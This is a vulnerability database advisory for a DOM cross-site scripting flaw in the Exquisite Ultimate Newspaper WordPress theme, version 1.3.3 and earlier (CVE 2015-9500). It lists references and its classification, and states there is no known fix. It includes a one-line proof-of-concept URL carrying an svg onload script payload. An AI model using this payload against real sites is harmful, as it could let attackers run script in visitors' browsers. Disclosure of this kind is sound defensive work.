Exquisite Ultimate Newspaper Theme <= 1.3.3 - DOM Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/#<svg/onload=prompt(document.domain)>

Affects Theme

no known fix

References

CVE 2015-9500
PacketStorm 131657
URL https://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter pvdl
Views 7061
Verified No
WPVDB ID 7980

Timeline

Publicly Published 2015-04-26 (about 5 years ago)
Added 2015-05-12 (about 5 years ago)
Last Updated 2020-01-22 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin